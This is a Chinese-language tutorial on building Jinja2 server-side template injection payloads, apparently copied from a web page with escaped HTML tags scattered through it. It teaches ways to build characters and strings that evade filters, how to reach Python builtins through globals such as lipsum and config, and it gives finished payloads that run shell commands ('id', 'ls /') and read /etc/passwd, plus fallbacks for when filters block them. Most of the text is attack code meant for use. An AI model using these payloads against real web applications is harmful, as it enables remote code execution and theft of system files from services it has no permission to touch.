Jinja SSTI 完全进阶教程<\/h1>

目录<\/h2>
整体 payload 构造思路<\/li>
常用技巧
任意自然数构造<\/li>
字符串处理技巧<\/li>
特殊字符生成<\/li> <\/ul> <\/li>
任意字符串构造
简单手法<\/li>
复杂手法<\/li> <\/ul> <\/li>
属性与字典访问<\/li>
全局函数利用<\/li>
最终 payload 构造<\/li> <\/ol>
1. 整体 payload 构造思路<\/h2>
传统 Jinja SSTI 利用方式存在以下问题：<\/p>
依赖 __subclasses__<\/code> 方法，需要从长列表中寻找特定类<\/li>
构造过程冗长复杂，如 [].__class__.__mro__[1].__subclasses__()[513].__init__.__globals__['__builtins__']['eval'](...)<\/code><\/li>
<\/ul>
更优的构造思路：<\/p>

优先使用全局变量（如 lipsum<\/code>）直接获取关键函数<\/li>
构造流程：

先构造特殊字符（"_", "%c"等）<\/li>
构造任意数字\/字符串<\/li>
获取全局变量属性<\/li>
调用 eval 等函数实现 RCE<\/li>
<\/ul>
<\/li>
<\/ol>
2. 常用技巧<\/h2>
2.1 任意自然数构造<\/h3>
十六进制\/二进制\/八进制<\/h4>
0x61<\/span>  # 97<\/span>
<\/span><\/span>0b1000001<\/span>  # 65<\/span>
<\/span><\/span>0o173<\/span>  # 123<\/span>
<\/span><\/span><\/code><\/pre>length 和 count filter<\/h4>
()|<\/span>length  # 0<\/span>
<\/span><\/span>()|<\/span>int|<\/span>e|<\/span>length  # 1<\/span>
<\/span><\/span>(()|<\/span>int~<\/span>()|<\/span>int)|<\/span>length  # 2<\/span>
<\/span><\/span>dict(iiiiiiiiii=<\/span>i)|<\/span>first|<\/span>count  # 10<\/span>
<\/span><\/span><\/code><\/pre>int filter<\/h4>
"123"<\/span>|<\/span>int  # 123<\/span>
<\/span><\/span><\/code><\/pre>sum filter<\/h4>
(1<\/span>,1<\/span>,1<\/span>,1<\/span>,1<\/span>)|<\/span>sum  # 5<\/span>
<\/span><\/span><\/code><\/pre>加减乘除<\/h4>
1<\/span>+<\/span>1<\/span>+<\/span>1<\/span>+<\/span>1<\/span>+<\/span>1<\/span>  # 5<\/span>
<\/span><\/span>True<\/span>+<\/span>True<\/span>+<\/span>True<\/span>  # 3<\/span>
<\/span><\/span><\/code><\/pre>Unicode 数字字符<\/h4>
int('႖႖႖႖႖႖'<\/span>)  # 666<\/span>
<\/span><\/span><\/code><\/pre>2.2 字符串处理技巧<\/h3>
获取字符串\/列表的第i个字符\/元素<\/h4>
"abcdef"<\/span>|<\/span>batch(2<\/span>)|<\/span>first|<\/span>last  # 获取第2个字符'b'<\/span>
<\/span><\/span><\/code><\/pre>字符串拼接<\/h4>
"a"<\/span>~<\/span>"b"<\/span>  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>字符串重复<\/h4>
"a"<\/span>*<\/span>5<\/span>  # "aaaaa"<\/span>
<\/span><\/span><\/code><\/pre>特殊字符生成<\/h4>
"<\/span>%c<\/span>"<\/span>%<\/span>(97<\/span>)  # "a"<\/span>
<\/span><\/span>"<\/span>%s%%<\/span>s"<\/span>  # "%s%s"<\/span>
<\/span><\/span><\/code><\/pre>2.3 常用 filter<\/h3>

capitalize<\/code>, lower<\/code>, upper<\/code><\/li>
escape<\/code>\/e<\/code>, forceescape<\/code><\/li>
pprint<\/code>, safe<\/code>, string<\/code><\/li>
trim<\/code>, unique<\/code><\/li>
urlencode<\/code><\/li>
<\/ul>
3. 任意字符串构造<\/h2>
3.1 简单手法<\/h3>
使用 %c<\/code><\/h4>
"<\/span>%c<\/span>"<\/span>%<\/span>(97<\/span>)~<\/span>"<\/span>%c<\/span>"<\/span>%<\/span>(98<\/span>)  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>使用 __add__<\/code><\/h4>
"a"<\/span>.<\/span>__add__("b"<\/span>)  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>使用 join<\/code><\/h4>
["a"<\/span>,"b"<\/span>]|<\/span>join  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>使用 replace<\/code><\/h4>
"axb"<\/span>|<\/span>replace("x"<\/span>,""<\/span>)  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>3.2 复杂手法<\/h3>
使用 lipsum.__globals__.concat<\/code><\/h4>
lipsum.<\/span>__globals__.<\/span>concat("a"<\/span>,"b"<\/span>)  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>使用 dict<\/code> 构造<\/h4>
dict(a=<\/span>"a"<\/span>,b=<\/span>"b"<\/span>)|<\/span>join  # "ab"<\/span>
<\/span><\/span><\/code><\/pre>4. 属性与字典访问<\/h2>
获取属性<\/h4>
lipsum.<\/span>__globals__
<\/span><\/span>config.<\/span>__class__
<\/span><\/span><\/code><\/pre>字典访问<\/h4>
dict(a=<\/span>1<\/span>)|<\/span>attr("a"<\/span>)  # 1<\/span>
<\/span><\/span>dict(a=<\/span>1<\/span>)["a"<\/span>]  # 1<\/span>
<\/span><\/span><\/code><\/pre>使用 map<\/code> filter<\/h4>
["a"<\/span>,"b"<\/span>]|<\/span>map("upper"<\/span>)|<\/span>list  # ["A","B"]<\/span>
<\/span><\/span><\/code><\/pre>5. 全局函数利用<\/h2>
使用 lipsum<\/code> 获取关键函数<\/h4>
lipsum.<\/span>__globals__.<\/span>__builtins__.<\/span>eval('114+514'<\/span>)
<\/span><\/span>lipsum.<\/span>__globals__.<\/span>__builtins__.<\/span>__import__('os'<\/span>).<\/span>popen('ls \/'<\/span>).<\/span>read()
<\/span><\/span>lipsum.<\/span>__globals__.<\/span>os.<\/span>popen('id'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>替代全局变量<\/h4>
当 lipsum<\/code> 被禁用时，可以使用：<\/p>

cycler<\/code><\/li>
g<\/code><\/li>
self<\/code><\/li>
request<\/code><\/li>
config<\/code><\/li>
<\/ul>
6. 最终 payload 构造<\/h2>
6.1 直接 RCE<\/h3>
lipsum.<\/span>__globals__.<\/span>__builtins__.<\/span>eval('__import__("os").system("id")'<\/span>)
<\/span><\/span><\/code><\/pre>6.2 通过 os 模块<\/h3>
lipsum.<\/span>__globals__.<\/span>os.<\/span>popen('id'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>6.3 文件读取<\/h3>
lipsum.<\/span>__globals__.<\/span>open('\/etc\/passwd'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>6.4 替代方案<\/h3>
当关键函数被过滤时：<\/p>
config.<\/span>__class__.<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>eval('__import__("os").system("id")'<\/span>)
<\/span><\/span><\/code><\/pre>总结<\/h2>

优先使用全局变量而非 __subclasses__<\/code> 方法<\/li>
构造流程遵循：特殊字符 → 数字\/字符串 → 属性访问 → 函数调用<\/li>
灵活运用各种 filter 和字符串操作技巧绕过限制<\/li>
掌握多种数字和字符串构造方法以应对不同过滤场景<\/li>
<\/ol>
通过系统性地掌握这些技巧，可以高效地构造出简洁有效的 Jinja SSTI payload。<\/p>